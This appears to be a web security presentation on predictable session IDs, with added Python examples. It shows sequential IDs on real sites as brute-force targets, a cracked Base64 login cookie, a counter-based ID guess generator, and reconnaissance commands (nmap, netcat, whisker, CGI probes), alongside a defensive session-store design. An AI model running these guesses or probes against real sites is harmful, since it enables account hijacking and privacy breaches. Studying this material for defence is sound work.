• Session ID should IN THEORY be just as secure as username/password
Session ID Overview
• While it is generally clear that username/password pairs are indeed authentication data and therefore sensitive, it is not generally understood that session IDs are just as sensitive because of their frequent use for authentication. See RFC 2964 (Use of HTTP State Management).
Session ID Overview
• Session IDs are commonly stored in cookies and/or URLs, and hidden fields of web pages (or some combination)
• Session ID generated by the WEB SERVER (IIS, etc.) when the user first hits the site, or by the WEB APPLICATION (ATG Dynamo, Apache Tomcat, BEA WebLogic, IBM WebSphere, .jsp, .asp, perl, etc.) when the user logs in
Cookie Refresher
• Sometimes the cookies are set to expire (i.e., be deleted) upon closing the browser; these are typically called “session cookies” or “non-persistent” cookies
• Persistent cookies last beyond a user's session (i.e. “Remember Me” option)
• Persistent cookies are usually stored on the user's hard drive in a location according to the particular operating system and browser (e.g. C:\Program files\netscape\users\username\cookies.txt for Netscape and C:\Documents and Settings\username\Cookies for IE on Win2K).
Cookie Refresher
• Cookie Refresher (RFC 2965); the seven fields below are those of one record in the Netscape-style cookies.txt file:
1.) domain: The website domain that created and that can read the variable.
2.) flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.
3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain.
4.) secure: A TRUE/FALSE value indicating if an SSL connection with the domain is needed to access the variable.
5.) expiration: The Unix time that the variable will expire on. Unix time is defined as the number of seconds since 00:00:00 GMT on Jan 1, 1970. Omitting the expiration date signals the browser to store the cookie only in memory; it will be erased when the browser is closed. (In the example below: expires July 27, 2006.)
6.) name: The name of the Session ID variable (in this case Apache).
7.) value: The value of the Session ID variable (in this case 64.3.40.151.16018996349247480).
www.redhat.com FALSE / FALSE 1154029490 Apache 64.3.40.151.16018996349247480
(fields 1 2 3 4 5 6 7 in order)
Cookie Stored Session ID Examples
.www.ibm.com TRUE /rc FALSE 1293768100 sauidp p0010000000006DCC10255298230000591992.003F75FEF2
.yahoo.com TRUE / FALSE 1271361612 B 3qpaarsu48dai&b=2
.amazon.com FALSE / FALSE 1026115299 session-id 103-1456769-7895034
.ebay.com TRUE / FALSE 1183296824 lucky8 694036
.starwars.com TRUE / FALSE 1341753778 Wookie-Cookie 13fe8fff4799f27dcf19c959dafa8437
.yahoo.com TRUE / FALSE 1154029490 I ir=9p&in=4aweec66&i1=AFABCl
.yahoo.com TRUE / FALSE 1154029490 PU t=1
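An added example (not from the presentation) that parses records in the seven-field cookies.txt layout the Cookie Refresher slide numbers 1 to 7. The file is tab-separated; the three sample records are the Red Hat, Amazon and Star Wars lines above re-assembled with tabs, and the function names are the example's own. cleartext_exposed lists the cookies whose secure flag is FALSE, which a browser will also send over plain HTTP.

```python
from datetime import datetime, timezone

# Three records in Netscape cookies.txt layout (tab-separated). These are the
# slide's own examples with the tabs restored; they are not live cookies.
SAMPLE_COOKIES_TXT = "\n".join([
    "www.redhat.com\tFALSE\t/\tFALSE\t1154029490\tApache\t64.3.40.151.16018996349247480",
    ".amazon.com\tFALSE\t/\tFALSE\t1026115299\tsession-id\t103-1456769-7895034",
    ".starwars.com\tTRUE\t/\tFALSE\t1341753778\tWookie-Cookie\t13fe8fff4799f27dcf19c959dafa8437",
])

FIELDS = ("domain", "flag", "path", "secure", "expiration", "name", "value")


def parse_cookie_line(line: str) -> dict:
    """Split one record into the seven fields numbered on the slide and type them."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 7:
        raise ValueError(f"expected 7 tab-separated fields, got {len(parts)}")
    rec = dict(zip(FIELDS, parts))
    rec["flag"] = rec["flag"] == "TRUE"           # every host in the domain may read it
    rec["secure"] = rec["secure"] == "TRUE"       # sent only over SSL
    rec["expiration"] = int(rec["expiration"])    # Unix time, seconds since 1970-01-01 UTC
    rec["expires_at"] = datetime.fromtimestamp(rec["expiration"], tz=timezone.utc)
    return rec


def parse_cookies_txt(text: str):
    """Parse a whole file, skipping blank and comment lines."""
    return [parse_cookie_line(l) for l in text.splitlines() if l and not l.startswith("#")]


def cleartext_exposed(text: str):
    """(domain, name) of every cookie with secure=FALSE: the browser will attach it
    to plain HTTP requests too, so a session ID in it travels in the clear even
    when the login itself happened over SSL."""
    return [(c["domain"], c["name"]) for c in parse_cookies_txt(text) if not c["secure"]]
```

All three sample records carry secure=FALSE, which is the practical point of the slide: the session ID is as sensitive as the password it replaced, yet unlike the password it is resent on every request, including the ones an attacker can sniff.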
URL Stored Session ID
• http://www.123greetings.com/view/7AD30725122120803
• http://evite.citysearch.com/r?iid=KVIJBUFDLPVMIVLXYUKB
• http://view.greetings.yahoo.com/greet/view?FXA96K95JAEJS
• http://www.atg.com/en/index.jhtml;jsessionid=HYMJK3PJUSJ4CCQCQBJCGWQKAKAFUIV0?_requestid=21122
• http://www.amazon.com/exec/obidos/subst/home/home.html/102-4524380-3923344
Session IDs in HTML Hidden Fields
<FORM METHOD=POST ACTION="/cgi-bin/bankonline.cgi">
<input type="hidden" name="sessionID" value="abcde1234">
<input type="hidden" name="useraccount" value="673-12745">
<input type="submit" name="Access My Bank Information">
</form>
Session ID Security Overview
Session ID security is a microcosm of web application security.
Web application security cuts through many different aspects of an organization's information security infrastructure.
An Example: Brute Forcing Session IDs in URLs
Dear Terry Gillette, An Anonymous Admirer has sent you a greeting card from 123Greetings.com, a FREE service committed to keep people in touch. To see your greeting card, choose from any of the following options which works best for you. --------Method 1-------- Just click on the following Internet address (if that doesn't work for you, copy & paste the address onto your browser's address box.)
http://www30.123greetings.com/card/08/01/05/20/BG20801052002282.html
An Example: Brute Forcing Session IDs in URLs
http://www.123greetings.com/view/AD30725122116211
http://www.123greetings.com/view/AD30725122118909
http://www.123greetings.com/view/AD30725122120803
http://www.123greetings.com/view/AD30725122122507
http://www.123greetings.com/view/AD30725122124100
Once we associate the date we sent these electronic cards on, July 25 at 12:21 PST, with the ID, we can eliminate some more entropy from this session ID (07251221). Notice that we are then left with five incrementing “random” digits at the end of the URL.
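To put numbers on “eliminate some more entropy”, the Python below is an added example (not from the deck) that takes the five 123Greetings IDs above and the five register.com change_password IDs shown later in the deck, finds the columns that never change across the samples, and sizes the guess space that is left. The assumption that a varying decimal column has ten possibilities, and the function names, are the example's own.

```python
import math

# The IDs observed on the slides: five cards sent in a row, and five
# register.com password-change links.
GREETINGS_IDS = ["AD30725122116211", "AD30725122118909", "AD30725122120803",
                 "AD30725122122507", "AD30725122124100"]
REGISTER_IDS = ["486218782865", "440218782891", "685218782917",
                "505218782956", "435218782969"]


def column_profile(ids):
    """Set of characters seen at each position across the samples."""
    width = len(ids[0])
    if any(len(i) != width for i in ids):
        raise ValueError("samples differ in length")
    return [{i[p] for i in ids} for p in range(width)]


def column_space(chars) -> int:
    """Guesses per varying column (assumption: decimal digit -> 10, else 36)."""
    return 10 if all(c.isdigit() for c in chars) else 36


def variable_positions(ids):
    return [p for p, chars in enumerate(column_profile(ids)) if len(chars) > 1]


def naive_keyspace(ids) -> int:
    """Size of the ID space once the constant columns are known."""
    space = 1
    for chars in column_profile(ids):
        if len(chars) > 1:
            space *= column_space(chars)
    return space


def entropy_bits(space: int) -> float:
    return math.log2(space)


def trailing_counter(ids):
    """Positions of the run of varying columns at the end of the ID (the
    'incrementing digits' the slide points out)."""
    var = set(variable_positions(ids))
    run, p = [], len(ids[0]) - 1
    while p in var:
        run.append(p)
        p -= 1
    return sorted(run)


def guesses_for_observed_window(ids) -> int:
    """Requests needed to cover every counter value between the lowest and the
    highest seen, times the other varying columns that must be enumerated too."""
    run = trailing_counter(ids)
    lo, hi = run[0], run[-1] + 1
    counters = [int(i[lo:hi]) for i in ids]
    profile = column_profile(ids)
    other = 1
    for p in variable_positions(ids):
        if p < lo:
            other *= column_space(profile[p])
    return other * (max(counters) - min(counters) + 1)


def candidate_ids(ids, limit: int):
    """First `limit` guesses: the lowest observed counter stepped up by one each
    time, with any other varying columns left as in the first sample."""
    run = trailing_counter(ids)
    lo, hi = run[0], run[-1] + 1
    base = ids[0]
    start = min(int(i[lo:hi]) for i in ids)
    return [base[:lo] + str(start + k).zfill(hi - lo) + base[hi:] for k in range(limit)]
```

log2 of the remaining space is the entropy of the ID as the attacker sees it: about 16.6 bits for 123Greetings and about 19.9 bits for register.com, and far less than that once the counter is assumed to sit near the values already seen. A session ID drawn from a cryptographic random number generator gives 128 bits with no counter, so a thousand observed samples say nothing about the next one.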
An Example: Brute Forcing Session IDs in URLs – AUTOMATED DEMO!
Why Brute Forcing Web Session IDs is Bad
• Can result in an online user’s web application account being hijacked or loss of privacy
• Easy to exploit
• Unlike typical login scenario, no failed login lockout
• Prevalent disclosure among security mailing lists
• Typical security solutions (firewalls, IDS, etc.) do nothing to detect attacks
• Log data is usually not that detailed
• IDS is not well developed for Web Application attacks
• SSL (server side) does nothing to protect against these attacks
In the News
– “Privacy hole found in Verizon Wireless Web site”, Computerworld, Sept 6, 2001.
  http://www.computerworld.com/securitytopics/security/privacy/story/0,10801,63587,00.html
  http://online.securityfocus.com/archive/1/211520
– https://www.app.airtouch.com/jstage/plsql/ec_navigation_wrapper.nav_frame_display?p_session_id=3346178&p_host=ACTION
URL Example: Brute Forcing Register.com
Thank you for using register.com's Domain Manager. To change or re-enter your password, please copy and paste the URL below into the "Location" or "Address" field of your web browser and hit the 'Enter' key on your keyboard. Note: If your e-mail program supports HTML, you may be able to click on the link below.
http://mydomain.register.com/change_password.cgi?155218782787
Note: Above link will expire within three days
Example 2: Brute Forcing Web Session IDs
http://mydomain.register.com/change_password.cgi?486218782865
http://mydomain.register.com/change_password.cgi?440218782891
http://mydomain.register.com/change_password.cgi?685218782917
http://mydomain.register.com/change_password.cgi?505218782956
http://mydomain.register.com/change_password.cgi?435218782969
URL Example – Brute Forcing Dfilm.com
-----Original Message-----
From: [email protected] [mailto:[email protected]]
Sent: Monday, July 01, 2002 1:38 PM
Subject: D.FILM Digital Movie for Dave
Dave created a digital movie for you!
You can view it at the following URL:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
Cheers,
Dave and DFILM.
Be sure to check out the web site at http://www.dfilm.com
URL Example – Brute Forcing Dfilm.com
No privacy for other users’ creations:
http://mm.dfilm.com/mm2s/mm_route.php?id=110532
http://mm.dfilm.com/mm2s/mm_route.php?id=110531
http://mm.dfilm.com/mm2s/mm_route.php?id=110530
http://mm.dfilm.com/mm2s/mm_route.php?id=110529
http://mm.dfilm.com/mm2s/mm_route.php?id=110528
http://mm.dfilm.com/mm2s/mm_route.php?id=110527
http://mm.dfilm.com/mm2s/mm_route.php?id=110526
http://mm.dfilm.com/mm2s/mm_route.php?id=…
URL Example – Sendomatic.com
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330
URL Example – Sendomatic.com
View other people’s events. Crash a party, edit an event, cancel an event, etc.
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76330
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76331
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76332
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76333
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76334
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76335
http://www.sendomatic.com/servlets/servlets/mysendo?uId=76336
http://www.sendomatic.com/servlets/servlets/mysendo?uId=…
Cookie Example – Freeservers.com
• LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0;
• Base 64 decode the string: http://www.securitystats.com/tools/base64.asp
testing123.itgo.com:1231234  (username:password)
• Next, automate it with a Perl exploit by feeding encoded strings into the cookie
Cookie Example – Freeservers.com
% perl freeservershack.pl
trying test
trying test123
trying 123123
trying 1231234
Cracked it! The password to testing123.itgo.com is 1231234
GET http://testing123.itgo.com/cgi-bin/util/my_member_area
User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U)
Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3D
Cookie2: $Version=1
%
Cookie Example – Freeservers.com
• Or a much longer way: use the brute forcer on every single cookie character combination
Cookie/URL Example – Amazon.com
• Some sites use the URL AND Cookie for authentication:
6 Common Problems
• Weak Algorithm – Many of the most popular web sites today are currently using linear algorithms based on easily predictable variables such as time or IP address.
• No Form of Account Lockout – With regard to Session ID brute force attacks, an attacker can probably try hundreds or thousands of Session IDs embedded in a legitimate URL without a single complaint from the web server.
• Short Key Space – Even the most cryptographically strong algorithm still allows an active Session ID to be easily determined if the size of the string’s key space is not sufficiently large.
6 Common Problems – Continued
• Indefinite Expiration on Server – Session IDs that do not expire on the web server can allow an attacker unlimited time to guess a valid Session ID.
• Transmitted in the Clear – Assuming SSL is not being used while the Session ID cookie is transmitted to and from the browser, the Session ID could be sniffed across a flat network taking the guess-work away for a miscreant. This is still a problem with proxy servers.
• Insecure Retrieval – By tricking the user’s browser into visiting another site, an attacker can retrieve stored Session ID information and quickly exploit this information before the user’s sessions expire. This can be done a number of ways: DNS poisoning, Cross-site Scripting, etc.
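The Freeservers cookie earlier in the deck and the “Weak Algorithm”, “No Form of Account Lockout” and “Indefinite Expiration on Server” problems above all have the same fix, and this added example shows it end to end. It is not code from the original slides or from Freeservers: decode_login_cookie only demonstrates that Base64 is encoding rather than protection (the cookie value is the one from the slide), and SessionStore is a server-side session table in which the cookie carries an opaque 256-bit random ID, the server enforces expiry, and repeated failed logins lock the account so the Perl-style guessing loop stalls after a handful of tries. DEMO_USERS and demo_check_password are constructed stand-ins for a real password-hash lookup, and the injectable clock exists so the expiry and lockout paths can be exercised deterministically.

```python
import base64
import hmac
import secrets
import time

# Constructed stand-in for a credential lookup. Real code compares against a
# password hash (bcrypt/argon2), never a stored plaintext.
DEMO_USERS = {"testing123.itgo.com": "1231234"}


def decode_login_cookie(value):
    """Base64 is encoding, not encryption: the cookie is the plaintext credential."""
    user, _, password = base64.b64decode(value).decode().partition(":")
    return user, password


def demo_check_password(username, password):
    expected = DEMO_USERS.get(username)
    if expected is None:
        return False
    return hmac.compare_digest(expected, password)  # constant-time compare


class SessionStore:
    """Opaque server-side sessions: random id, server-enforced expiry, lockout.

    Nothing about the user is in the cookie, so there is nothing to decode; the
    id is 256 random bits, so there is nothing to guess; and the server, not the
    client, decides when a session dies and when an account is locked.
    """

    def __init__(self, ttl_seconds=900, max_failures=5, lockout_seconds=300, clock=time.time):
        self._sessions = {}    # session id -> (username, expires_at)
        self._failures = {}    # username -> (failure count, locked_until)
        self.ttl = ttl_seconds
        self.max_failures = max_failures
        self.lockout = lockout_seconds
        self.clock = clock     # injectable for tests

    def login(self, username, password, check_password=demo_check_password):
        now = self.clock()
        count, locked_until = self._failures.get(username, (0, 0.0))
        if now < locked_until:
            return None                          # locked: the password is not even evaluated
        if locked_until and now >= locked_until:
            count = 0                            # lock has expired, start counting afresh
        if not check_password(username, password):
            count += 1
            locked_until = now + self.lockout if count >= self.max_failures else 0.0
            self._failures[username] = (count, locked_until)
            return None
        self._failures.pop(username, None)
        sid = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        self._sessions[sid] = (username, now + self.ttl)
        return sid

    def user_for(self, sid):
        """Resolve a presented session id; expired ids are removed, not just refused."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        username, expires_at = entry
        if self.clock() >= expires_at:
            del self._sessions[sid]
            return None
        return username

    def logout(self, sid):
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    print(decode_login_cookie("dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0"))
    store = SessionStore()
    sid = store.login("testing123.itgo.com", "1231234")
    print(sid, store.user_for(sid))
```

The Set-Cookie header for such a session should carry only the returned id, with the Secure and HttpOnly flags, which also addresses the “Transmitted in the Clear” and part of the “Insecure Retrieval” items: a cookie that is never sent over plain HTTP and is unreadable from script is far harder to sniff or lift than one holding username:password.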
Tools
• Sessions Auditor – www.idefense.com/idtools/Session_Auditor.zip
• Visual Testing – WebSleuth – www.geocities.com/dzzie/sleuth
• WebProxy – www.atstake.com/research/tools/index.html
• HTTPush – httpush.sourceforge.net
• Achilles – www.digizen-security.com/downloads.html
• MiniBrowser – aignes.com/download.htm
• Some good things:
– Completeness
– Large knowledge bases (at least possibly)
• Puts Web security assessment into the hands of anyone who calls themselves an “Information Security Expert”.
Why Automated Tools Don’t Work Very Well
• Every programmer does things a little differently
• Authentication schemes are hard to automate
• Error codes are not standardized
• Sometimes simple things like SSL get in the way
Why People are Better
• Recognition of subtle errors
• We understand the impact and therefore the risk of a vulnerability
• We are grounded in the fundamentals of Computer Science and therefore are able to find “real” bugs, flaws in logic
Web Hacking Accessories
• Some helpful tools include…
– A port scanner (Nmap et al.) www.insecure.org/nmap/
– Netcat; the network swiss army knife http://www.atstake.com/research/tools/network_utilities/
– A vulnerability scanner; Whisker http://www.wiretrip.net/rfp/p/doc.asp/i3/d21.htm
– OpenSSL source and documentation (OpenSSL, RFC 2246)
New tools on the horizon…
• Nikto – CGI scanner, similar to whisker 1.4. Checks for CGIs, common dirs, and old versions. Database frequently updated. http://www.cirt.net/
• WHArsenal – Set of CGIs that plug into an existing Apache install. Allows for all kinds of requests, while controlling/modifying request particulars. http://community.whitehatsec.com/
• @stake WebProxy – Assessment proxy with full fuzzer/rewriting capabilities. Implemented in Java; supports Linux, Solaris, and Windows. http://www.atstake.com/
• Nessus – Has a few new interesting web assessment plugins which do site crawling/mirroring and a few other interesting things. http://www.nessus.org/
Basic Training for Web Combat…
• Port scanning – Look for well-known TCP web ports: 80, 81, 443, 8000, 8080, etc.
• Using FScan (from Foundstone):
  fscan -p 80,81,443,8000,8080 10.0.0.1
• Using nmap (by Fyodor):
  nmap -p 80,81,443,8000,8080 10.0.0.1
Basic Training for Web Combat…
• Fingerprinting – HTTP banner grabbing
– netcat as a TCP client (even telnet works):
  nc 10.0.0.1 80
  HEAD / HTTP/1.0
• Advanced HTTP methods: TRACE, OPTIONS, etc.
Basic Training for Web Combat…
Shaking the tree for the low-hanging fruit…
• Scan using a database of known web vulnerabilities.
• Whisker (by Rain Forest Puppy):
  ./whisker.pl -h 10.0.0.1 -I 1
• cgichk.c:
  <snip>
  "GET /cgi-bin/phf HTTP/1.0\n\n";
  "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
  "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
  "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
• ISS, Cybercop, Retina, etc.
el33t hax0r Training for Web Combat…
What about SSL?
• Some SSL Myths:
– “We are secure because we use SSL!”
– “Strong 128 bit crypto being used”
– “We use Digital Certificates signed by VeriSign”
Proxy Over SSL
• Using netcat and OpenSSL, it is possible to create a simple two-line SSL proxy!
• Listen on port 80 on a host and redirect requests to port 443 on a remote host through SSL.
[Diagram: Web client → nc (listening on port 80) → openssl → SSL web server (port 443)]
Assessment Tools
• Vulnerability scanners
– Look for a known list of vulnerable applications or technologies
– Do not (can not) engage/scan custom applications and configurations
– General vulnerability scanners: ISS, Cybercop, Nessus
– Web-specific vulnerability scanners: WebInspect, whisker
Assessment Tools
• ‘Proxy monitors’
– HTTP proxy which monitors traffic, looking for web vulnerabilities as they pass
– Can analyze custom applications with the help of a user
– Examples: AppScan, RFProxy, HTTPush, Achilles
Root Causes of Web Hacks
• Complex web architectures may cause oversight in web server configuration.
• URL parsing.
• File canonicalization.
• Combination of underlying operating system and web server may leave holes.
Root Causes of Web Hacks
• Untested code used in web applications, to save time.
• Level of security consciousness low in web application developers.
• Security vs. convenience.
• Security vs. time-to-market.
• Zero knowledge administration breeds zero knowledge administrators.